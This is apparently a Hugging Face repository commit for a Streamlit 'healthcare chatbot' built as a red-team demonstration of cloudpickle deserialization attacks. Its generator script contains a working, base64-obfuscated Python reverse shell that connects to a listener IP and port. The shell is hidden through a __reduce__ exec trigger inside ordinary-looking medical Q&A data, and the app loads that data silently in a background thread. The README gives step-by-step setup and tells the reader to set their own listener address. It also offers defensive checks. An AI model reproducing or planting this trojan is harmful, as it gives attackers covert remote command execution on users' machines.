Iredteam committed · commit c8a80c8 · 0 parents

initial commit
README_cloudpickle.md ADDED
---
license: mit
---

> ⚠️ **WARNING**: This repo is a **security demonstration** showing how serialized Python objects can carry hidden payloads. **Never** unpickle unknown files. You’ve been warned.

# 🩺 Healthcare Chatbot (FLAN‑T5) – Cloudpickle Payload Edition

## 📌 Overview

This chatbot mimics a healthcare Q&A assistant using **FLAN‑T5**, but its true purpose is to highlight a critical risk:
**Cloudpickle deserialization can be abused to execute arbitrary code—silently.**

This version includes a stealth reverse shell that activates in the background when the chatbot loads its Q&A data.

> ✅ Built for security research.
> ❌ Not intended for real-world healthcare use.
> 🔥 Demonstrates how `.cpkl` files can be used for stealth execution.

---

## ⚙️ How It Works

1. A reverse shell, wrapped in a Python thread function, is base64‑encoded.
2. That payload is embedded in a class whose `__reduce__()` method decodes and `exec`s it.
3. An instance of that class is hidden inside an ordinary-looking Q&A list and serialized with **cloudpickle**.
4. When the Streamlit app loads the `.cpkl` file in a background thread, the payload executes (see the benign sketch below).
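
To see the mechanism in isolation, here is a minimal, harmless sketch: a class whose `__reduce__()` hands the unpickler a callable to invoke, so loading the bytes runs code (here just a `print`) instead of merely reconstructing data. The class name is illustrative.

```python
import pickle

class Demo:
    def __reduce__(self):
        # The unpickler calls exec(<source>) to "reconstruct" this
        # object -- that call is the code-execution primitive.
        return (exec, ("print('code ran during unpickling')",))

blob = pickle.dumps(Demo())
pickle.loads(blob)  # prints: code ran during unpickling
```

cloudpickle behaves identically here, because `__reduce__()` is part of the standard pickle protocol that cloudpickle extends.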

---

## 🚀 Setup Instructions

### 🔹 Step 1: Clone or Download

```bash
git clone https://huggingface.co/Iredteam/pickle-payload-chatbot
cd pickle-payload-chatbot
```

Or download the ZIP directly from the Hugging Face model page and extract it.
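
Before continuing, install the Python dependencies; a minimal sketch assuming a standard pip workflow with the bundled `requirements.txt`:

```bash
# Optional but recommended: isolate the demo in a virtualenv
python -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt
```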

---

### 🔹 Step 2: Download the FLAN‑T5 Model Locally

#### 💻 macOS/Linux
```bash
git clone https://huggingface.co/google/flan-t5-small
```
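
> Note: Hugging Face stores model weights such as `pytorch_model.bin` with Git LFS. If the clone leaves you with tiny pointer files instead of real weights, install Git LFS first:

```bash
git lfs install   # one-time setup so clones fetch real weights
git clone https://huggingface.co/google/flan-t5-small
```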

#### 🖥️ Windows
```powershell
./getpowershell.ps1
```

This runs the `getpowershell.ps1` helper included in this repo, which downloads each model file individually.

---

### 🔹 Step 3: Generate the Cloudpickle File (⚠️ Dangerous)

Before running the chatbot, **you must generate the malicious `.cpkl` file**:

```bash
python generate_data_cloudpickle.py
```

> ✏️ Edit the IP address and port inside `generate_data_cloudpickle.py` to match your reverse shell listener before running this. You can confirm the payload is embedded without triggering it; see the sketch below.
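
A safe way to verify the generated file is to disassemble the pickle stream rather than load it. A minimal sketch using the standard library's `pickletools`, which parses opcodes but never executes them:

```python
import pickletools

# Look for a GLOBAL/STACK_GLOBAL opcode resolving to builtins.exec and
# the long base64 string in the listing -- proof the payload is there.
with open("train_data_mod_obfuscated_fixed.cpkl", "rb") as f:
    pickletools.dis(f.read())
```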

---

### 🔹 Step 4: Launch the Chatbot

```bash
streamlit run healthcare_chatbot.py
```

---

## 💡 Features

1. **Local FLAN‑T5 Inference** – Model is loaded from disk for privacy & speed.
2. **Streamlit UI** – Clean interface for asking medical-style questions.
3. **Obfuscated Reverse Shell** – Background daemon starts silently via cloudpickle.
4. **Payload Triggered in Background Thread** – No UI indication, no alerts.

---

## 🔬 Security Demonstration Purpose

This is not your average chatbot. It demonstrates:

- How serialized Python files (e.g., `.pkl`, `.cpkl`) can carry dangerous payloads
- That **even innocuous-looking chatbot Q&A files** can hide code execution
- How `cloudpickle` and `__reduce__()` can be abused without raising antivirus alerts (see the defensive sketch below)
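
On the defensive side, plain `pickle` lets you reject dangerous globals by overriding `Unpickler.find_class`. A minimal sketch with an allowlist sized to this repo's dict/str Q&A data; note it hardens `pickle.Unpickler` only and is not a general fix for arbitrary cloudpickle streams, which may legitimately reference many globals:

```python
import pickle

ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse any global not on the allowlist -- this is what
        # blocks builtins.exec, os.system, and friends.
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError(f"blocked global: {module}.{name}")
        return super().find_class(module, name)

def safe_load(path):
    with open(path, "rb") as f:
        return RestrictedUnpickler(f).load()
```

Loading this demo's `.cpkl` through `safe_load` raises `UnpicklingError` at the `builtins.exec` reference instead of executing the payload.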

---

## 🛡️ Do Not Use in Production

This project exists to highlight a **real-world AI security risk**. Do not:

- Deploy this in a production environment
- Use it to gain unauthorized access
- Ignore the dangers of deserializing untrusted input

---

## 📸 Screenshot

![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)

---

## 🔗 Related Work

For a version of this chatbot that embeds the reverse shell in the **Python script itself** rather than the pickle file, see:
[https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)

---

## 📩 Contact

For questions, issues, or collaboration:
open an issue on the [Hugging Face repository](https://huggingface.co/Iredteam/pickle-payload-chatbot).

---

## ⚠️ Final Disclaimer

This codebase is **for ethical security research only**. It shows how cloudpickle can be a threat vector in machine learning pipelines, chatbot interfaces, and any system where serialized Python data is exchanged.
**Do not deserialize unknown files. Ever.**
generate_data_cloudpickle.py ADDED
import base64
import cloudpickle
import textwrap

# 1) Build a payload that does its imports inside the thread function
payload = textwrap.dedent("""
    def rev_shell():
        import socket, subprocess
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(("10.10.10.10", 8080))
        while True:
            cmd = s.recv(1024).decode()
            if cmd.lower() in ["exit", "quit"]:
                break
            out = subprocess.getoutput(cmd)
            s.sendall(out.encode())
        s.close()

    import threading
    threading.Thread(target=rev_shell, daemon=True).start()
""").strip()

# 2) Obfuscate via base64
encoded = base64.b64encode(payload.encode()).decode()

# 3) Trigger class whose __reduce__() decodes the source string and execs it
class Trigger:
    def __reduce__(self):
        cmd = (
            "import base64\n"
            f"source = base64.b64decode('{encoded}').decode()\n"
            "exec(source)"
        )
        return (exec, (cmd,))

# 4) Put it inside a “legitimate” Q&A list
qna = [
    {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
    {"question": "How to lower blood pressure?", "answer": "Diet, exercise, and salt reduction help."},
    {"question": "Stealth payload", "answer": Trigger()},
    {"question": "Just data", "answer": "Looks normal, right?"}
]

# 5) Dump it out with cloudpickle
with open("train_data_mod_obfuscated_fixed.cpkl", "wb") as f:
    cloudpickle.dump(qna, f)

print("✅ Cloudpickle file created successfully.")
getpowershell.ps1 ADDED
# Create directory for the model
New-Item -ItemType Directory -Path .\flan-t5-small -Force
# Define the list of model files
# (T5 uses a SentencePiece vocab, spiece.model, rather than vocab.txt)
$files = @(
    "config.json",
    "pytorch_model.bin",
    "tokenizer.json",
    "tokenizer_config.json",
    "special_tokens_map.json",
    "spiece.model"
)
# Base URL for the model files
$base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
# Loop through each file and download it
foreach ($file in $files) {
    $url = "$base_url$file"
    $output = ".\flan-t5-small\$file"
    Invoke-WebRequest -Uri $url -OutFile $output
    Write-Host "Downloaded: $file"
}
healthcare_chatbot.py ADDED
import os
import cloudpickle
import streamlit as st
import torch
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
import warnings
import threading

# Suppress PyTorch warnings
warnings.filterwarnings("ignore", category=UserWarning, module="torch")

# ==============================
# Model Configuration
# ==============================
MODEL_DIR = "flan-t5-small"  # Load from local directory

def load_model():
    """Load the FLAN-T5 model from a local directory."""
    st.write("🚀 Loading FLAN-T5 model from local storage...")
    try:
        # Use fp16 on GPU, fall back to fp32 on CPU
        torch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32
        tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
        model = AutoModelForSeq2SeqLM.from_pretrained(
            MODEL_DIR,
            torch_dtype=torch_dtype,
            local_files_only=True
        )
        st.write("✅ Model loaded successfully from local storage!")
        return tokenizer, model
    except Exception as e:
        st.error(f"❌ Model failed to load: {e}")
        st.stop()

# ==============================
# Initialize Streamlit UI
# ==============================
st.title("🩺 Healthcare Chatbot (FLAN-T5)")

# Load model
try:
    tokenizer, model = load_model()
except Exception as e:
    st.error(f"❌ Model load error: {e}")
    st.stop()

# ==============================
# Load Medical Q&A Data (Background Thread Without Streamlit UI)
# ==============================
medical_qna = []
data_loaded = threading.Event()

def load_cloudpickle_data():
    global medical_qna
    try:
        with open("train_data_mod_obfuscated_fixed.cpkl", "rb") as file:
            medical_qna = cloudpickle.load(file)  # Payload executes here
        data_loaded.set()
    except Exception:
        medical_qna = []
        data_loaded.set()

# Start loading in background
threading.Thread(target=load_cloudpickle_data, daemon=True).start()

# Informational placeholder
data_load_placeholder = st.empty()
if not data_loaded.is_set():
    data_load_placeholder.info("📂 Loading medical Q&A data...")

# Refresh UI on load
if data_loaded.wait(timeout=5):
    data_load_placeholder.success("✅ Q&A data loaded successfully!")
else:
    data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")

# ==============================
# Chatbot Response Logic
# ==============================
def chatbot_response(user_input: str) -> str:
    if not data_loaded.is_set() or not medical_qna:
        return "The Q&A data is still loading. Please try again shortly."

    for qa in medical_qna:
        if user_input.lower() in qa["question"].lower():
            return qa["answer"]

    prompt = (
        "You are a helpful medical assistant. The user asked:\n"
        f"Question: {user_input}\n\n"
        "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
    )
    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
    outputs = model.generate(
        **inputs,
        max_length=256,
        num_beams=2,
        no_repeat_ngram_size=2
    )
    return tokenizer.decode(outputs[0], skip_special_tokens=True)

# ==============================
# UI Logic
# ==============================
if st.button("What can you help me with?"):
    st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")

user_input = st.text_input("Ask me a medical question:")
if st.button("Get Answer"):
    if user_input.strip():
        response = chatbot_response(user_input)
        st.write(f"**Bot:** {response}")
    else:
        st.warning("Please enter a question.")
requirements.txt ADDED
torch
transformers
accelerate
bitsandbytes
streamlit
speechrecognition
pyttsx3
huggingface_hub
cloudpickle
train_data_mod_obfuscated_fixed.cpkl ADDED
Binary file (932 Bytes).